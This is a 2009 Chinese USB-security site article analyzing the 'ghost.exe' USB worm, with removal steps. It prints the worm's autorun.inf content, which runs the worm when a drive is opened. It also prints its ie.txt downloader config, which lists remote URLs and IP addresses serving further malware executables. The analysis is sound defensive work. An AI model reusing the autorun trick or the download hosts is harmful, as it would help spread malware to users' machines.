U盘之家 > U盘安全 > 病毒新闻 > ghost.exe U盘病毒详细介绍

ghost.exe U盘病毒详细介绍

2009-06-01 22:09来源:优盘之家编辑:ZXC 浏览量:
  • U盘问题,请到问答平台:http://www.upan.cc/
  •   核心提示:
    ghost.exe U盘病毒详细介绍 运行ghost.exe 后生成 ghost.exe.bat(删除自身) C:\WINDOWS\system\conime.exe C:\Program Files\WinRAR\WinRAR.exe.tmp 每个盘符下释放(c d e f g h j k ) autorun.inf ghost.exe autorun.inf 文件内容

      

    ghost.exe U盘病毒详细介绍

      运行ghost.exe 后生成
      ghost.exe.bat(删除自身)
      C:\WINDOWS\system\conime.exe
      C:\Program Files\WinRAR\WinRAR.exe.tmp

      每个盘符下释放(c d e f g h j k )
      autorun.inf
      ghost.exe

      autorun.inf 文件内容
      [AutoRun]
      OPEN=ghost.exe
      shellexecute=ghost.exe
      shell\打开(&O)\command=ghost.exe

      连入 http://www.dj916.com/ie.txt 下载
      ie.txt 内容
      [main]
      服务文件更新=5
      服务文件地址=http://www.86dy.net/c123.exe

      下载者是否更新=4
      下载个数=7

      文件1=http://222.220.16.185/data6/jwm.exe
      更新1=6
      文件2=http://222.220.16.185/data6/wol.exe
      更新2=6 U盘之家
      文件3=http://222.220.16.185/data6/wo3.exe
      更新3=6
      文件4=http://222.220.16.185/data6/mir.exe
      更新4=6
      文件5=http://222.220.16.185/data6/mhh.exe
      更新5=6
      文件6=http://222.220.16.181/ienet.exe
      更新6=6
      文件7=http://222.220.16.185/data6/zt3.exe
      更新7=6

      这些网址都是下载下来的病毒,没写入注册表,但是我用反汇编看了看这玩意应该修改了讯雷 QQ WINRAR 的注册表。

      处理方法(不包括下载下来的病毒)
      右键=>打开进入每个盘符=>删除
      autorun.inf
      ghost.exe

      删除文件
      C:\WINDOWS\system\conime.exe

      建议重装 qq 讯雷 WINRAR

      最后我还发现个玩意
      00407345 MOV EDX,123.004076B4 你好瑞星 我喜欢你~

      作者难不成暗恋瑞星?? www.upan.cc

    ghost.exe U盘病毒详细介绍:https://www.upan.cc/security/news/2009/youpan_356.html

     

    将选中内容分享到新浪微博 将选中内容分享到腾讯微博
    (U)优盘之家,是一个集U盘量产工具U盘启动盘制作工具内存卡修复工具U盘检测工具于一体的专业指导性网站,请牢记我们的域名:www.upan.cc
    评论(请自觉遵守互联网相关政策法规,管理可以直接删除恶意评论、广告或违禁词语):
    表情:
     
    网友评论
    回顶部
    关于我们 | 免责声明 | 广告服务 | 联系我们 | 合作联系 | 网站地图 | 友情链接 | 关于淘宝直营店
    copyright © 2002-2005 upan.cc. all rights reserved .
    蜀ICP备09012900号